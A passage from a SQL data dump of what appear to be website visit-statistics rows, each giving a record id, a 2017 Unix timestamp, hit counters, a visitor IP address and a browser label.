'other'),(125920,1498451549,1,0,1,0,'66.249.76.113',''),(125921,1498451611,1,1,0,0,'91.196.178.68','firefox'),(125922,1498451684,1,1,0,0,'91.196.177.44','chrome'),(125923,1498451713,1,1,0,0,'164.132.161.97','other'),(125924,1498451749,1,1,0,0,'217.182.132.174','other'),(125925,1498451803,1,1,0,0,'51.255.71.130','other'),(125926,1498452144,1,1,0,0,'217.182.132.4','other'),(125927,1498452604,1,0,1,0,'68.180.230.48',''),(125928,1498454064,1,1,0,0,'137.74.207.120','other'),(125929,1498454800,1,1,0,0,'51.255.65.89','other'),(125930,1498455000,1,1,0,0,'178.92.159.239','chrome'),(125931,1498455005,1,1,0,0,'51.255.65.48','other'),(125932,1498455021,1,1,0,0,'51.255.65.23','other'),(125933,1498455305,1,1,0,0,'217.182.132.21','other'),(125934,1498456053,1,0,1,0,'66.249.76.113',''),(125935,1498456216,1,1,0,0,'164.132.161.82','other'),(125936,1498457634,1,1,0,0,'217.182.132.76','other'),(125937,1498458263,1,1,0,0,'137.74.207.164','other'),(125938,1498458328,1,1,0,0,'51.255.71.126','other'),(125939,1498458960,1,1,0,0,'51.255.65.59','other'),(125940,1498459016,1,1,0,0,'217.182.132.181','other'),(125941,1498459286,1,0,1,0,'68.180.230.48',''),(125942,1498459449,1,1,0,0,'8.29.198.26','other'),(125943,1498459593,1,1,0,0,'164.132.161.27','other'),(125944,1498459800,1,1,0,0,'51.255.65.12','other'),(125945,1498460024,36,36,0,0,'69.30.234.2','other'),(125946,1498460214,1,1,0,0,'164.132.162.159','other'),(125947,1498460436,1,1,0,0,'95.132.17.25','chrome'),(125948,1498460456,1,1,0,0,'91.196.178.70','chrome'),(125949,1498460481,1,1,0,0,'51.255.71.110','other'),(125950,1498461546,1,1,0,0,'92.113.11.221','chrome'),(125951,1498462090,1,1,0,0,'51.255.71.117','other'),(125952,1498462153,1,1,0,0,'91.196.178.72','firefox'),(125953,1498462345,1,1,0,0,'217.182.132.52','other'),(125954,1498462994,1,1,0,0,'66.102.9.153','chrome'),(125955,1498463213,1,1,0,0,'66.249.66.75','chrome'),(125956,1498463735,1,0,1,0,'66.249.66.74',''),(125957,1498463795,1,1,0,0,'95.134.203.126','chrome'),(125958,1498463855,1,1,0,0,'66.249.66.76','chrome'),(125959,1498463858,1,0,1,0,'66.249.76.113',''),(125960,1498464519,1,1,0,0,'178.93.107.126','chrome'),(125961,1498464732,1,1,0,0,'207.46.13.91','other'),(125962,1498464744,1,1,0,0,'66.249.76.114','chrome'),(125963,1498464933,1,1,0,0,'216.244.66.237','other'),(125964,1498464968,1,1,0,0,'164.132.162.158','other'),(125965,1498465335,1,1,0,0,'217.182.132.65','other'),(125966,1498465937,2,0,2,0,'66.249.76.131',''),(125967,1498466055,1,1,0,0,'217.182.132.68','other'),(125968,1498466313,1,1,0,0,'66.249.76.137','chrome'),(125969,1498466421,1,1,0,0,'95.108.213.25','other'),(125970,1498466423,1,1,0,0,'178.154.200.12','other'),(125971,1498466504,1,1,0,0,'109.68.43.102','chrome'),(125972,1498466960,1,1,0,0,'217.69.133.203','other'),(125973,1498466963,1,1,0,0,'217.69.133.2','other'),(125974,1498467162,1,1,0,0,'164.132.161.24','other'),(125975,1498467570,1,1,0,0,'91.196.178.165','chrome'),(125976,1498467805,1,1,0,0,'51.255.65.65','other'),(125977,1498467946,1,1,0,0,'51.255.71.128','other'),(125978,1498468111,1,0,1,0,'68.180.230.48',''),(125979,1498468400,1,1,0,0,'40.77.167.2','other'),(125980,1498468615,1,1,0,0,'164.132.161.91','other'),(125981,1498468674,2,2,0,0,'207.46.13.91','other'),(125982,1498469072,1,1,0,0,'217.182.132.60','other'),(125983,1498469256,1,1,0,0,'178.154.189.10','other'),(125984,1498469368,1,0,1,0,'66.249.75.28',''),(125985,1498469482,1,0,1,0,'68.180.230.48',''),(125986,1498470139,1,1,0,0,'188.166.83.42','chrome'),(125987,1498470265,1,1,0,0,'8.29.198.26','other'),(125988,1498470474,1,1,0,0,'91.196.177.15','chrome'),(125989,1498470520,1,1,0,0,'109.63.229.125','chrome'),(125990,1498470527,1,1,0,0,'164.132.161.34','other'),(125991,1498470544,1,0,1,0,'68.180.230.48',''),(125992,1498470810,1,1,0,0,'92.112.109.230','chrome'),(125993,1498471419,1,0,1,0,'66.249.76.131',''),(125994,1498471931,1,1,0,0,'217.182.132.180','other'),(125995,1498472089,1,1,0,0,'46.165.197.142','other'),(125996,1498472092,1,1,0,0,'51.255.65.58','other'),(125997,1498472511,1,1,0,0,'217.69.133.9','other'),(125998,1498472622,1,1,0,0,'185.137.18.31','chrome'),(125999,1498474523,1,1,0,0,'51.255.65.22','other'),(126000,1498475014,1,1,0,0,'51.255.65.75','other'),(126001,1498475232,1,0,1,0,'66.249.66.156',''),(126002,1498475313,1,1,0,0,'217.182.132.149','other'),(126003,1498475413,1,1,0,0,'217.182.132.183','other'),(126004,1498475682,1,1,0,0,'217.182.132.157','other'),(126005,1498476420,1,1,0,0,'164.132.161.46','other'),(126006,1498476979,1,1,0,0,'51.255.65.42','other'),(126007,1498477459,1,1,0,0,'46.201.232.228','chrome'),(126008,1498477806,1,0,1,0,'66.249.76.112',''),(126009,1498478303,1,0,1,0,'66.249.66.74',''),(126010,1498478597,1,1,0,0,'217.182.132.186','other'),(126011,1498478658,1,1,0,0,'91.209.11.236','other'),(126012,1498478665,1,1,0,0,'46.201.232.228','chrome'),(126013,1498478703,1,1,0,0,'164.132.161.83','other'),(126014,1498478755,1,1,0,0,'164.132.162.187','other'),(126015,1498478896,1,1,0,0,'217.182.132.67','other'),(126016,1498478958,1,1,0,0,'217.182.132.240','other'),(126017,1498479157,1,1,0,0,'46.119.149.115','chrome'),(126018,1498479600,1,1,0,0,'51.255.65.82','other'),(126019,1498479764,1,1,0,0,'164.132.161.61','other'),(126020,1498479902,1,1,0,0,'164.132.161.74','other'),(126021,1498480091,1,1,0,0,'164.132.161.40','other'),(126022,1498480355,1,1,0,0,'91.196.178.165','chrome'),(126023,1498480459,1,1,0,0,'51.255.65.2','other'),(126024,1498480674,3,3,0,0,'91.209.11.236','other'),(126025,1498481016,1,1,0,0,'164.132.161.25','other'),(126026,1498481082,1,1,0,0,'164.132.162.156','other'),(126027,1498481093,1,1,0,0,'8.29.198.25','other'),(126028,1498481285,1,1,0,0,'217.182.132.32','other'),(126029,1498481336,1,1,0,0,'217.182.132.52','other'),(126030,1498481385,1,1,0,0,'141.8.142.152','other'),(126031,1498481457,1,1,0,0,'178.154.200.27','other'),(126032,1498481540,1,1,0,0,'141.8.132.47','other'),(126033,1498481794,1,1,0,0,'164.132.161.9','other'),(126034,1498481908,2,2,0,0,'91.209.11.236','other'),(126035,1498481976,1,1,0,0,'141.8.132.49','other'),(126036,1498482103,1,1,0,0,'141.8.142.50','other'),(126037,1498482249,1,1,0,0,'141.8.132.37','other'),(126038,1498482328,1,1,0,0,'217.182.132.66','other'),(126039,1498482340,1,1,0,0,'87.228.66.245','chrome'),(126040,1498482346,1,1,0,0,'62.122.67.11','chrome'),(126041,1498482367,1,1,0,0,'95.132.47.178','chrome'),(126042,1498482454,1,1,0,0,'5.255.253.54','other'),(126043,1498482728,1,1,0,0,'51.255.65.23','other'),(126044,1498483146,1,1,0,0,'178.154.200.70','other'),(126045,1498483243,1,1,0,0,'51.255.65.47','other'),(126046,1498483284,1,1,0,0,'66.249.76.131','chrome'),(126047,1498483292,1,1,0,0,'178.154.189.10','other'),(126048,1498483479,1,1,0,0,'51.255.71.129','other'),(126049,1498483560,1,1,0,0,'87.250.224.26','other'),(126050,1498483564,1,1,0,0,'141.8.142.74','other'),(126051,1498483571,1,1,0,0,'92.113.189.130','chrome'),(126052,1498483580,1,1,0,0,'95.108.213.25','other'),(126053,1498483607,1,1,0,0,'164.132.161.17','other'),(126054,1498483652,1,1,0,0,'87.250.224.21','other'),(126055,1498484067,1,1,0,0,'141.8.142.70','other'),(126056,1498484247,3,3,0,0,'141.8.132.47','other'),(126057,1498484255,1,0,1,0,'66.249.76.114',''),(126058,1498484383,1,1,0,0,'217.182.132.6','other'),(126059,1498484405,1,1,0,0,'141.8.142.152','other'),(126060,1498484585,1,1,0,0,'51.255.65.40','other'),(126061,1498484674,1,1,0,0,'217.182.132.76','other'),(126062,1498484865,1,1,0,0,'164.132.161.92','other'),(126063,1498485038,1,1,0,0,'217.182.132.155','other'),(126064,1498485054,1,1,0,0,'178.154.200.42','other'),(126065,1498485163,1,1,0,0,'91.196.178.165','chrome'),(126066,1498485193,1,1,0,0,'37.9.113.11','other'),(126067,1498485232,1,1,0,0,'5.255.253.54','other'),(126068,1498485307,1,1,0,0,'95.221.232.49','chrome'),(126069,1498485462,1,1,0,0,'66.249.76.131','chrome'),(126070,1498485643,2,2,0,0,'40.77.167.60','other'),(126071,1498485676,1,1,0,0,'66.249.66.74','chrome'),(126072,1498485714,1,0,1,0,'68.180.230.48',''),(126073,1498485762,1,1,0,0,'216.244.66.237','other'),(126074,1498485859,2,2,0,0,'141.8.142.152','other'),(126075,1498485909,1,1,0,0,'217.182.132.186','other'),(126076,1498486055,1,1,0,0,'178.154.200.42','other'),(126077,1498486132,1,1,0,0,'51.255.65.34','other'),(126078,1498486303,1,1,0,0,'164.132.161.3','other'),(126079,1498486322,1,1,0,0,'217.182.132.93','other'),(126080,1498486410,1,1,0,0,'91.196.178.70','chrome'),(126081,1498486599,2,2,0,0,'5.255.253.54','other'),(126082,1498486647,1,1,0,0,'91.196.178.68','firefox'),(126083,1498486766,4,4,0,0,'141.8.142.134','other'),(126084,1498487190,1,1,0,0,'217.182.132.185','other'),(126085,1498487222,2,2,0,0,'178.154.200.42','other'),(126086,1498487318,1,1,0,0,'141.8.132.47','other'),(126087,1498487592,1,1,0,0,'5.255.253.54','other'),(126088,1498487943,1,1,0,0,'141.8.142.134','other'),(126089,1498488010,1,1,0,0,'5.255.253.23','other'),(126090,1498488129,1,1,0,0,'51.255.65.46','other'),(126091,1498488158,1,1,0,0,'164.132.161.20','other'),(126092,1498488273,1,1,0,0,'178.92.75.213','chrome'),(126093,1498488473,1,1,0,0,'5.255.253.16','other'),(126094,1498488476,1,1,0,0,'87.250.224.31','other'),(126095,1498488730,1,1,0,0,'137.74.207.101','other'),(126096,1498488791,1,1,0,0,'54.165.59.7','other'),(126097,1498489071,1,0,1,0,'66.249.76.113',''),(126098,1498489073,1,1,0,0,'217.182.132.72','other'),(126099,1498489388,1,1,0,0,'217.182.132.69','other'),(126100,1498489449,1,1,0,0,'37.9.113.11','other'),(126101,1498489471,1,1,0,0,'51.255.65.54','other'),(126102,1498489932,1,1,0,0,'46.201.112.21','chrome'),(126103,1498489996,1,1,0,0,'164.132.161.40','other'),(126104,1498490261,1,1,0,0,'141.8.132.47','other'),(126105,1498490306,1,1,0,0,'95.108.179.17','other'),(126106,1498490522,1,1,0,0,'54.165.59.7','other'),(126107,1498490838,1,1,0,0,'164.132.161.52','other'),(126108,1498491377,1,1,0,0,'217.69.133.9','other'),(126109,1498491652,1,1,0,0,'91.209.11.236','other'),(126110,1498491927,1,1,0,0,'8.29.198.26','other'),(126111,1498492404,1,1,0,0,'106.75.76.16','chrome'),(126112,1498492568,1,1,0,0,'216.244.66.237','other'),(126113,1498492717,1,1,0,0,'164.132.162.187','other'),(126114,1498493450,1,1,0,0,'216.145.5.42','firefox'),(126115,1498493507,1,1,0,0,'51.255.65.47','other'),(126116,1498493694,1,1,0,0,'217.182.132.80','other'),(126117,1498493714,1,1,0,0,'164.132.164.180','other'),(126118,1498493718,1,1,0,0,'164.132.161.85','other'),(126119,1498493851,1,1,0,0,'141.8.142.152','other'),(126120,1498493914,1,1,0,0,'51.255.71.110','other'),(126121,1498494089,1,1,0,0,'137.74.201.100','other'),(126122,1498494157,1,1,0,0,'141.8.142.134','other'),(126123,1498494387,1,1,0,0,'51.255.65.25','other'),(126124,1498494596,1,0,1,0,'66.249.76.113',''),(126125,1498494668,1,0,1,0,'66.249.76.114',''),(126126,1498494872,1,1,0,0,'157.55.39.160','other'),(126127,1498494995,1,0,1,0,'66.249.76.131',''),(126128,1498495136,1,1,0,0,'66.249.76.113','chrome'),(126129,1498495147,1,1,0,0,'164.132.161.58','other'),(126130,1498495332,1,1,0,0,'66.249.66.76','chrome'),(126131,1498495570,1,1,0,0,'37.73.205.126','chrome'),(126132,1498496189,1,0,1,0,'66.249.76.131',''),(126133,1498496914,1,1,0,0,'217.69.133.9','other'),(126134,1498497486,1,1,0,0,'51.255.65.45','other'),(126135,1498497687,1,1,0,0,'164.132.161.2','other'),(126136,1498498439,1,1,0,0,'164.132.162.156','other'),(126137,1498498599,1,1,0,0,'178.255.215.94','other'),(126138,1498498632,1,1,0,0,'5.255.253.54','other'),(126139,1498498811,1,1,0,0,'141.8.132.47','other'),(126140,1498498835,1,1,0,0,'91.196.178.34','chrome'),(126141,1498498912,1,1,0,0,'141.8.142.152','other'),(126142,1498498958,1,1,0,0,'66.249.66.155','chrome'),(126143,1498499077,3,3,0,0,'141.8.142.134','other'),(126144,1498499330,2,2,0,0,'178.154.200.42','other'),(126145,1498499410,2,2,0,0,'37.9.113.11','other'),(126146,1498499929,1,0,1,0,'66.249.66.76',''),(126147,1498500038,1,1,0,0,'5.255.253.54','other'),(126148,1498500131,1,0,1,0,'66.249.76.137',''),(126149,1498500251,1,1,0,0,'141.8.132.49','other'),(126150,1498500394,1,0,1,0,'68.180.230.48',''),(126151,1498500719,1,1,0,0,'178.154.200.42','other'),(126152,1498500772,1,1,0,0,'141.8.142.152','other'),(126153,1498500782,1,1,0,0,'37.9.113.11','other'),(126154,1498500873,1,1,0,0,'40.77.167.60','other'),(126155,1498500932,1,0,1,0,'66.249.76.112',''),(126156,1498500953,2,2,0,0,'141.8.142.134','other'),(126157,1498501534,1,0,1,0,'66.249.76.114',''),(126158,1498501636,1,0,1,0,'66.249.75.27',''),(126159,1498501860,4,4,0,0,'141.8.132.47','other'),(126160,1498502080,2,2,0,0,'5.255.253.54','other'),(126161,1498502099,1,1,0,0,'91.196.178.34','chrome'),(126162,1498502109,1,1,0,0,'94.180.192.213','msie'),(126163,1498502423,1,1,0,0,'217.69.133.2','other'),(126164,1498502464,1,1,0,0,'95.108.213.25','other'),(126165,1498502472,1,1,0,0,'180.76.15.34','other'),(126166,1498502670,1,1,0,0,'141.8.142.152','other'),(126167,1498502757,1,1,0,0,'8.29.198.25','other'),(126168,1498502786,4,4,0,0,'141.8.132.47','other'),(126169,1498502941,1,1,0,0,'37.9.113.11','other'),(126170,1498503260,2,2,0,0,'141.8.142.134','other'),(126171,1498503412,1,1,0,0,'5.255.253.54','other'),(126172,1498503533,1,1,0,0,'178.154.200.42','other'),(126173,1498503604,1,0,1,0,'66.249.76.131',''),(126174,1498503611,1,1,0,0,'91.196.178.166','chrome'),(126175,1498503901,1,1,0,0,'178.255.215.94','other'),(126176,1498503998,1,0,1,0,'68.180.230.48',''),(126177,1498504054,3,3,0,0,'141.8.142.152','other'),(126178,1498504070,4,4,0,0,'91.209.11.236','other'),(126179,1498504641,4,4,0,0,'5.255.253.54','other'),(126180,1498504770,1,1,0,0,'141.8.132.49','other'),(126181,1498504868,1,1,0,0,'5.255.253.23','other'),(126182,1498504966,1,1,0,0,'141.8.132.47','other'),(126183,1498505014,1,1,0,0,'157.55.39.204','other'),(126184,1498505624,1,1,0,0,'91.209.11.236','other'),(126185,1498505903,1,1,0,0,'141.8.142.134','other'),(126186,1498506153,1,1,0,0,'178.154.200.42','other'),(126187,1498506230,1,1,0,0,'141.8.142.152','other'),(126188,1498506391,1,1,0,0,'217.69.133.203','other'),(126189,1498507010,1,1,0,0,'95.108.179.17','other'),(126190,1498507142,1,0,1,0,'66.249.76.112',''),(126191,1498507146,2,2,0,0,'66.249.76.113','chrome'),(126192,1498507173,1,0,1,0,'66.249.66.157',''),(126193,1498507188,1,1,0,0,'5.255.253.75','other'),(126194,1498507815,1,1,0,0,'109.63.129.153','msie'),(126195,1498507975,1,1,0,0,'40.77.167.60','other'),(126196,1498508217,3,3,0,0,'178.154.200.42','other'),(126197,1498508283,1,1,0,0,'128.72.208.243','msie'),(126198,1498508419,1,1,0,0,'37.9.113.11','other'),(126199,1498508554,1,1,0,0,'141.8.142.152','other'),(126200,1498509028,1,1,0,0,'91.209.11.236','other'),(126201,1498509307,1,1,0,0,'141.8.142.134','other'),(126202,1498509999,1,1,0,0,'37.9.113.11','other'),(126203,1498510482,1,1,0,0,'79.164.132.186','msie'),(126204,1498510483,1,1,0,0,'188.32.239.201','msie'),(126205,1498510558,1,1,0,0,'66.249.76.113','chrome'),(126206,1498510791,1,1,0,0,'66.249.76.137','chrome'),(126207,1498510876,4,2,2,0,'66.249.76.112',''),(126208,1498511092,1,1,0,0,'91.209.11.236','other'),(126209,1498511131,1,1,0,0,'180.76.15.152','other'),(126210,1498511349,1,0,1,0,'68.180.230.48',''),(126211,1498511714,1,0,1,0,'66.249.66.75',''),(126212,1498511855,1,0,1,0,'66.249.76.131',''),(126213,1498511887,1,1,0,0,'178.154.200.42','other'),(126214,1498511979,1,1,0,0,'217.69.133.4','other'),(126215,1498511989,1,1,0,0,'141.8.142.152','other'),(126216,1498512227,1,1,0,0,'5.255.253.27','other'),(126217,1498512300,2,2,0,0,'95.108.213.25','other'),(126218,1498512374,6,6,0,0,'37.9.113.11','other'),(126219,1498512444,1,1,0,0,'141.8.132.49','other'),(126220,1498512516,3,3,0,0,'5.255.253.54','other'),(126221,1498512629,4,4,0,0,'141.8.142.134','other'),(126222,1498512780,1,1,0,0,'91.209.11.236','other'),(126223,1498512819,1,0,1,0,'66.249.76.112',''),(126224,1498512857,1,0,1,0,'68.180.230.48',''),(126225,1498512967,1,1,0,0,'141.8.142.152','other'),(126226,1498513578,1,1,0,0,'8.29.198.27','other'),(126227,1498514267,1,1,0,0,'157.55.39.160','other'),(126228,1498514419,1,1,0,0,'51.255.71.122','other'),(126229,1498514474,1,0,1,0,'68.180.230.48',''),(126230,1498515632,1,1,0,0,'95.220.206.61','chrome'),(126231,1498515737,1,1,0,0,'51.255.65.60','other'),(126232,1498515999,1,1,0,0,'164.132.161.9','other'),(126233,1498516248,1,1,0,0,'5.255.253.54','other'),(126234,1498516401,1,1,0,0,'164.132.161.74','other'),(126235,1498516599,1,1,0,0,'51.255.65.28','other'),(126236,1498516703,1,0,1,0,'66.249.76.114',''),(126237,1498516758,1,1,0,0,'157.55.39.160','other'),(126238,1498516815,1,1,0,0,'51.255.65.92','other'),(126239,1498516983,1,1,0,0,'216.244.66.237','other'),(126240,1498517070,1,1,0,0,'51.255.65.82','other'),(126241,1498517503,1,1,0,0,'51.255.65.72','other'),(126242,1498517524,1,1,0,0,'217.69.133.194','other'),(126243,1498518119,1,1,0,0,'217.182.132.58','other'),(126244,1498518293,1,1,0,0,'217.182.132.156','other'),(126245,1498518830,1,1,0,0,'217.182.132.65','other'),(126246,1498519220,1,1,0,0,'217.182.132.74','other'),(126247,1498519418,1,0,1,0,'68.180.230.48',''),(126248,1498519761,1,1,0,0,'194.88.220.18','chrome'),(126249,1498519810,1,1,0,0,'217.182.132.185','other'),(126250,1498519964,1,1,0,0,'141.8.142.142','other'),(126251,1498519966,1,1,0,0,'87.250.224.26','other'),(126252,1498520033,1,1,0,0,'217.182.132.57','other'),(126253,1498520192,1,1,0,0,'157.55.39.204','other'),(126254,1498522445,1,1,0,0,'217.182.132.148','other'),(126255,1498523228,1,0,1,0,'68.180.230.48',''),(126256,1498523392,1,1,0,0,'51.255.65.24','other'),(126257,1498523732,1,1,0,0,'217.182.132.155','other'),(126258,1498524115,1,0,1,0,'66.249.75.30',''),(126259,1498524174,1,1,0,0,'164.132.161.54','other'),(126260,1498524406,1,1,0,0,'8.29.198.25','other'),(126261,1498524471,1,1,0,0,'164.132.161.36','other'),(126262,1498526061,2,2,0,0,'91.209.11.236','other'),(126263,1498526132,1,1,0,0,'51.255.65.78','other'),(126264,1498526463,1,0,1,0,'68.180.230.48',''),(126266,1498526607,1,1,0,0,'164.132.161.92','other'),(126267,1498526622,1,1,0,0,'66.249.66.156','chrome'),(126268,1498527187,1,1,0,0,'128.69.225.174','msie'),(126269,1498527188,1,1,0,0,'95.28.49.214','msie'),(126270,1498527879,1,1,0,0,'51.255.71.116','other'),(126271,1498528707,1,1,0,0,'217.182.132.63','other'),(126272,1498528949,1,1,0,0,'217.182.132.7','other'),(126273,1498529059,1,1,0,0,'217.182.132.153','other'),(126274,1498529602,1,1,0,0,'217.182.132.35','other'),(126275,1498531108,1,1,0,0,'51.255.65.24','other'),(126276,1498531277,1,1,0,0,'217.182.132.176','other'),(126277,1498531287,1,1,0,0,'164.132.161.34','other'),(126278,1498531859,1,1,0,0,'164.132.161.77','other'),(126279,1498532372,1,1,0,0,'217.182.132.92','other'),(126280,1498532449,1,1,0,0,'164.132.161.28','other'),(126281,1498532751,1,1,0,0,'51.255.71.98','other'),(126282,1498533944,1,1,0,0,'164.132.162.164','other'),(126283,1498534082,1,1,0,0,'164.132.161.7','other'),(126284,1498534777,1,1,0,0,'137.74.201.100','other'),(126285,1498535232,1,1,0,0,'8.29.198.26','other'),(126286,1498535267,1,0,1,0,'68.180.230.48',''),(126287,1498535313,1,1,0,0,'217.182.132.50','other'),(126288,1498536306,1,1,0,0,'217.182.132.88','other'),(126289,1498536402,1,1,0,0,'164.132.161.92','other'),(126290,1498537807,1,1,0,0,'141.8.183.12','other'),(126291,1498537978,1,1,0,0,'164.132.161.2','other'),(126292,1498538265,1,1,0,0,'91.196.178.70','firefox'),(126293,1498538609,1,1,0,0,'51.255.71.126','other'),(126294,1498538613,1,1,0,0,'51.255.65.29','other'),(126295,1498538872,1,1,0,0,'217.182.132.79','other'),(126296,1498539475,1,1,0,0,'217.182.132.175','other'),(126297,1498539654,1,1,0,0,'137.74.201.108','other'),(126298,1498539854,1,1,0,0,'178.255.215.94','other'),(126299,1498540121,1,1,0,0,'164.132.161.92','other'),(126300,1498540436,1,1,0,0,'188.32.185.75','msie'),(126301,1498540483,1,0,1,0,'66.249.76.137',''),(126302,1498540765,1,1,0,0,'217.182.132.182','other'),(126303,1498540924,1,1,0,0,'51.255.71.131','other'),(126304,1498541013,1,1,0,0,'217.182.132.87','other'),(126305,1498541014,1,1,0,0,'217.182.132.64','other'),(126306,1498541391,1,1,0,0,'217.182.132.146','other'),(126307,1498541499,1,1,0,0,'94.179.117.213','chrome'),(126308,1498541528,1,1,0,0,'176.15.236.70','msie'),(126309,1498541664,2,2,0,0,'91.196.178.70','chrome'),(126310,1498542628,1,1,0,0,'91.196.178.70','firefox'),(126311,1498542742,1,1,0,0,'91.196.178.34','chrome'),(126312,1498542985,1,1,0,0,'91.196.178.70','chrome'),(126313,1498543167,1,1,0,0,'216.244.66.237','other'),(126314,1498543240,1,1,0,0,'164.132.161.62','other'),(126315,1498543303,1,0,1,0,'68.180.230.48',''),(126316,1498543698,1,1,0,0,'217.182.132.149','other'),(126317,1498543905,1,1,0,0,'176.105.211.235','chrome'),(126318,1498543963,1,1,0,0,'157.55.39.160','other'),(126319,1498544090,1,1,0,0,'137.74.207.109','other'),(126320,1498544563,1,1,0,0,'217.69.133.3','other'),(126321,1498544837,1,1,0,0,'180.76.15.150','other'),(126322,1498545200,1,1,0,0,'51.255.65.37','other'),(126323,1498545537,1,1,0,0,'217.182.132.61','other'),(126324,1498545918,1,1,0,0,'216.244.66.237','other'),(126325,1498545953,1,1,0,0,'95.135.242.26','chrome'),(126326,1498545954,1,1,0,0,'193.200.32.118','chrome'),(126327,1498546063,1,1,0,0,'8.29.198.27','other'),(126328,1498546291,1,1,0,0,'176.193.122.39','msie'),(126329,1498546481,1,1,0,0,'91.209.11.236','other'),(126330,1498547029,1,1,0,0,'164.132.162.158','other'),(126331,1498547611,1,1,0,0,'95.84.129.5','msie'),(126332,1498547839,1,1,0,0,'51.255.71.116','other'),(126333,1498547874,1,1,0,0,'141.8.132.47','other'),(126334,1498547934,1,1,0,0,'66.102.9.136','chrome'),(126335,1498547957,1,1,0,0,'51.255.65.78','other'),(126336,1498548214,1,1,0,0,'91.209.11.236','other'),(126337,1498548324,1,1,0,0,'91.196.178.70','firefox'),(126338,1498548556,1,1,0,0,'91.124.11.6','chrome'),(126339,1498548672,1,1,0,0,'51.255.71.126','other'),(126340,1498549321,1,1,0,0,'51.255.65.37','other'),(126341,1498549409,1,1,0,0,'91.196.178.70','firefox'),(126342,1498549505,1,1,0,0,'164.132.161.4','other'),(126343,1498549966,1,1,0,0,'164.132.161.28','other'),(126344,1498550437,1,1,0,0,'141.8.142.152','other'),(126345,1498550452,1,1,0,0,'141.8.132.47','other'),(126346,1498550536,1,1,0,0,'91.196.178.70','firefox'),(126347,1498550707,1,1,0,0,'51.255.65.75','other'),(126348,1498550848,1,1,0,0,'217.182.132.152','other'),(126349,1498551292,2,2,0,0,'128.199.41.16','chrome'),(126350,1498551810,1,1,0,0,'91.196.178.70','firefox'),(126351,1498551932,1,1,0,0,'51.255.71.129','other'),(126352,1498552041,1,1,0,0,'164.132.161.7','other'),(126353,1498553162,1,1,0,0,'51.255.71.115','other'),(126354,1498553175,1,1,0,0,'217.182.132.72','other'),(126355,1498553730,1,1,0,0,'176.31.231.10','other'),(126356,1498554493,65,65,0,0,'86.165.31.218','other'),(126357,1498554526,1,1,0,0,'178.94.114.157','chrome'),(126358,1498554535,1,1,0,0,'5.255.253.54','other'),(126359,1498554811,1,1,0,0,'164.132.161.10','other'),(126360,1498554978,1,1,0,0,'164.132.161.76','other'),(126361,1498554996,1,1,0,0,'164.132.161.82','other'),(126362,1498555122,1,1,0,0,'91.196.178.67','chrome'),(126363,1498555630,1,1,0,0,'164.132.161.78','other'),(126364,1498555999,1,1,0,0,'91.196.178.70','chrome'),(126365,1498556493,1,1,0,0,'95.134.176.197','chrome'),(126366,1498556856,1,1,0,0,'93.74.212.147','firefox'),(126367,1498556887,1,1,0,0,'8.29.198.27','other'),(126368,1498557041,1,1,0,0,'176.31.231.10','other'),(126369,1498557371,1,1,0,0,'217.182.132.14','other'),(126370,1498557389,1,1,0,0,'91.196.178.129','firefox'),(126371,1498558154,1,1,0,0,'164.132.161.23','other'),(126372,1498558263,1,1,0,0,'51.255.71.128','other'),(126373,1498559107,1,1,0,0,'91.196.178.67','chrome'),(126374,1498559640,1,1,0,0,'5.255.253.54','other'),(126375,1498560237,1,1,0,0,'217.182.132.53','other'),(126376,1498560400,1,1,0,0,'164.132.161.90','other'),(126377,1498560414,1,1,0,0,'217.182.132.88','other'),(126378,1498560624,1,1,0,0,'164.132.161.73','other'),(126379,1498560690,1,1,0,0,'164.132.161.11','other'),(126380,1498560735,1,1,0,0,'164.132.161.83','other'),(126381,1498560764,1,1,0,0,'66.102.9.157','chrome'),(126382,1498560808,1,1,0,0,'157.55.39.204','other'),(126383,1498561391,1,1,0,0,'91.196.178.70','chrome'),(126384,1498562548,1,1,0,0,'91.196.178.66','firefox'),(126385,1498562584,1,1,0,0,'51.255.65.47','other'),(126386,1498562648,1,1,0,0,'95.132.97.240','firefox'),(126387,1498563358,1,1,0,0,'178.95.247.243','firefox'),(126388,1498563472,1,1,0,0,'164.132.161.73','other'),(126389,1498563813,1,1,0,0,'51.255.65.86','other'),(126390,1498563988,1,1,0,0,'217.182.132.62','other'),(126391,1498564086,1,1,0,0,'217.182.132.187','other'),(126392,1498564307,1,1,0,0,'46.165.197.142','other'),(126393,1498564488,1,1,0,0,'66.249.64.155','chrome'),(126394,1498564643,1,1,0,0,'188.32.239.100','chrome'),(126395,1498564644,1,1,0,0,'109.63.229.59','chrome'),(126396,1498564763,1,0,1,0,'66.249.76.137',''),(126397,1498565044,1,1,0,0,'51.255.65.79','other'),(126398,1498566504,1,1,0,0,'51.255.65.71','other'),(126399,1498566553,1,1,0,0,'95.132.97.240','firefox'),(126400,1498566650,1,1,0,0,'217.182.132.30','other'),(126401,1498566817,1,1,0,0,'178.95.247.243','firefox'),(126402,1498566837,1,1,0,0,'51.255.65.89','other'),(126403,1498567026,1,1,0,0,'51.255.65.42','other'),(126404,1498567159,1,1,0,0,'51.255.65.82','other'),(126405,1498567169,1,1,0,0,'51.255.71.98','other'),(126406,1498567453,1,1,0,0,'164.132.161.7','other'),(126407,1498567466,1,1,0,0,'51.255.71.130','other'),(126408,1498567711,1,1,0,0,'8.29.198.27','other'),(126409,1498567734,1,1,0,0,'51.255.71.131','other'),(126410,1498567735,1,1,0,0,'193.200.173.149','chrome'),(126411,1498567833,1,1,0,0,'178.95.247.243','firefox'),(126412,1498567960,1,1,0,0,'95.134.176.197','chrome'),(126413,1498568744,1,0,1,0,'68.180.230.48',''),(126414,1498569039,1,1,0,0,'51.255.65.4','other'),(126415,1498569394,1,1,0,0,'130.180.219.204','chrome'),(126416,1498569490,1,1,0,0,'217.182.132.28','other'),(126417,1498569781,1,1,0,0,'51.255.65.51','other'),(126418,1498569821,2,0,2,0,'68.180.230.48',''),(126419,1498570219,1,0,1,0,'66.249.75.29',''),(126420,1498570871,1,1,0,0,'51.255.65.55','other'),(126421,1498571675,1,0,1,0,'66.249.66.157',''),(126422,1498571731,1,1,0,0,'164.132.161.57','other'),(126423,1498571753,1,1,0,0,'51.255.65.86','other'),(126424,1498572220,1,1,0,0,'188.255.23.139','msie'),(126425,1498572477,1,1,0,0,'217.182.132.185','other'),(126426,1498572788,1,1,0,0,'51.255.65.42','other'),(126427,1498572895,1,1,0,0,'51.255.65.34','other'),(126428,1498573311,1,1,0,0,'178.92.249.113','chrome'),(126429,1498573689,1,1,0,0,'217.182.132.4','other'),(126430,1498573913,1,0,1,0,'68.180.230.48',''),(126431,1498573979,1,1,0,0,'51.255.65.54','other'),(126432,1498574092,1,1,0,0,'164.132.161.20','other'),(126433,1498574